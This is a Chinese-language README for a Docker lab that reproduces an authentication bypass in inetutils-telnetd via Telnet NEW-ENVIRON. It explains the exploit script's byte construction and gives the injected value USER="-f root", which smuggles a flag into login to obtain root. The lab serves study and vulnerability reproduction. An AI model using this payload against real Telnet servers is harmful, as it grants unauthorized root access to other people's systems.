tiborscholtz/CVE-2026-24061

# Docker Telnet 自动登录实验环境    一个轻量级的 Docker 实验环境，用于实验 **Telnet 协议协商**，这在 [CVE-2026-24061](https://www.cve.org/CVERecord?id=CVE-2026-24061) 漏洞利用中有所解释，其中包含使用 **NEW-ENVIRON** 选项进行的自动用户名注入。 本项目创建了一个隔离的客户端-服务器环境，用于研究 Telnet 如何处理基于环境的身份验证绕过。 ## 功能特性 * 使用 Docker Compose 的隔离双容器实验环境 * 自定义 Python Telnet 客户端 * 自动 USER 环境变量注入 * 基础 Telnet 选项协商处理 * 基于内部 Docker DNS 的服务发现 * 最小化、可复现的设置 ## 架构 ``` +---------+ labnet +---------+ | node1 | ------------------> | node2 | | Client | | Telnet | | Python | | Server | +---------+ +---------+ ``` | 容器 | 角色 | | --------- | ------------------------------------ | | node1 | 带有自动登录脚本的 Python 客户端 | | node2 | Telnet 服务器 (`inetutils-telnetd 2.7`) | 两个服务都运行在一个名为 `labnet` 的私有 Docker bridge 网络内部。 ## 项目结构 ``` . ├── compose.yaml ├── Dockerfile.node1 ├── Dockerfile.node2 └── exploit.py ``` ### 文件详情 #### Dockerfile.node1 此文件负责安装名为 `node1` 的客户端容器。 我选择 `python:3.12-slim` 作为基础镜像，因为本实验的目的是网络通信。我们只安装 telnet 客户端本身，并将 `exploit.py` 复制到容器的根目录。 #### Dockerfile.node2 此文件负责安装名为 `node2` 的服务器容器。 该容器也使用相同的基础镜像。然而，安装过程涉及更多步骤： - 更新后，我们需要安装 `wget`，以获取存在漏洞的 telnetd 版本。 - 下载存在漏洞的版本后，使用 `apt get install -y` 进行安装。 - 附加到 `/etc/inetd.conf` 的行启用了 telnet 服务。 - 最后一条命令将 inetd daemon 设置为容器的启动命令。 #### exploit.py 在文件顶部，我们看到声明了一些常量： ``` IAC = 255 DO = 253 DONT = 254 WILL = 251 WONT = 252 SB = 250 SE = 240 ``` IAC 的值为 255，意味着“解释为命令”(Interpret As Command)，因此它标志着 Telnet 控制序列的开始。 你可以在[这里](https://www.ibm.com/docs/en/zos/3.2.0?topic=problems-telnet-commands-options)查看更多选项。 格式通常如下所示： ``` IAC ``` 脚本中有以下部分： ``` # 处理 telnet 协商 if IAC in data: handle_telnet_negotiation(sock, data, username) ``` 这个 if 判断检查如果从服务器接收到的当前数据包含 `IAC` 值，我们需要将其作为命令进行解释。 我们使用 while 循环遍历接收到的数据。我们检查每个字节是否为 `IAC`。 ``` if data[i] == IAC: cmd = data[i+1] opt = data[i+2] ``` 如果是，我们为 cmd 和 opt 变量分配数据流中的相应字节。 如果 `opt` 值等于 `NEW_ENVIRON` 的值，脚本将运行 `send_new_environ_user` 方法。 让我们检查以下代码部分： ``` data = bytes([ IAC, SB, NEW_ENVIRON, 0, # IS ENV_USERVAR ]) + b"USER" + bytes([ENV_VALUE]) + username.encode() + bytes([ IAC, SE ]) ``` `SB` 和 `SE` 是 Telnet 协议常量的一部分。`SB` 代表“子协商开始”，而 `SE` 代表“子协商结束”。这两个值之间的任何内容都是与发送到服务器的特定命令相关的设置。在这种情况下，我们要使用 `rfc1572` 标准发送消息，详情见[这里](https://www.rfc-editor.org/rfc/rfc1572)。 我们可以将字节序列大致翻译成英文，如下所示： ``` - Interpret this as a command (IAC) - It is (0) - A new environment variable (NEW_ENVIRON) - The value of this new environment variable is (b"USER" + bytes([ENV_VALUE]) + username.encode()) - End the subconnection (IAC + SE) ``` 然而，在某些情况下，目标 Telnet 服务器不支持与用户名相关的环境变量。在这种情况下，我们回退到以传统方式发送用户名。 ## 环境要求 * Docker 24+ * Docker Compose v2+ 验证安装： ``` docker --version docker compose version ``` ## 快速开始 ### 1. 构建并启动环境 ``` docker compose up --build -d ``` 检查状态： ``` docker ps ``` 你应该看到： * `node1` * `node2` ### 2. 在客户端容器中打开 shell ``` docker exec -it node1 bash ``` 设置用户名并运行脚本： ``` USER="-f root" python exploit.py node2 ``` 脚本将： * 连接到端口 23 上的 `node2` * 执行 Telnet 协商 * 使用 NEW-ENVIRON 发送 `USER=-f root` * 如有必要，回退到提示符检测 ## 网络配置 * 网络名称：`labnet` * Docker 内部 DNS 允许主机名解析 * 没有端口暴露给主机 * 通信仅限于容器之间 | 主机名 | 服务 | | -------- | ------------- | | node1 | 客户端 | | node2 | Telnet 服务器 | ## 实现说明 客户端脚本： * 处理 Telnet 控制序列 `IAC`、`DO`、`WILL`，这些是基本的 Telnet 协议命令，用于客户端和服务器之间的选项协商。 * 响应 `NEW-ENVIRON` 请求 * 发送： ``` USER= ``` * 检测 `login:` 或 `username:` 提示符作为后备方案 ## 停止并清理 停止环境： ``` docker compose down ``` 如果你还想移除容器和镜像： ``` docker compose down --rmi all ``` ## 安全声明 Telnet 以明文传输数据，**并不安全**。 本项目**仅用于教育目的**，且必须在隔离环境中使用。 ## 故障排除 **连接被拒绝** * 确保容器正在运行： docker ps **脚本以 USER 错误退出** * 确保设置了环境变量： ``` USER="-f root" python exploit.py node2 ``` **更改后重新构建** ``` docker compose up --build ``` ## 许可证 本仓库仅供**教育和研究使用**。 欢迎贡献和改进。

标签：BOF, CVE-2026-24061, Docker, Docker Compose, inetutils-telnetd, NEW-ENVIRON, PoC, Python, Telnet协议, 免杀, 利用代码, 协议协商, 安全实验, 安全防御评估, 无后门, 暴力破解, 欺骗防御, 漏洞复现, 版权保护, 环境变量注入, 用户名注入, 网络安全, 自动化登录, 认证绕过, 请求拦截, 隐私保护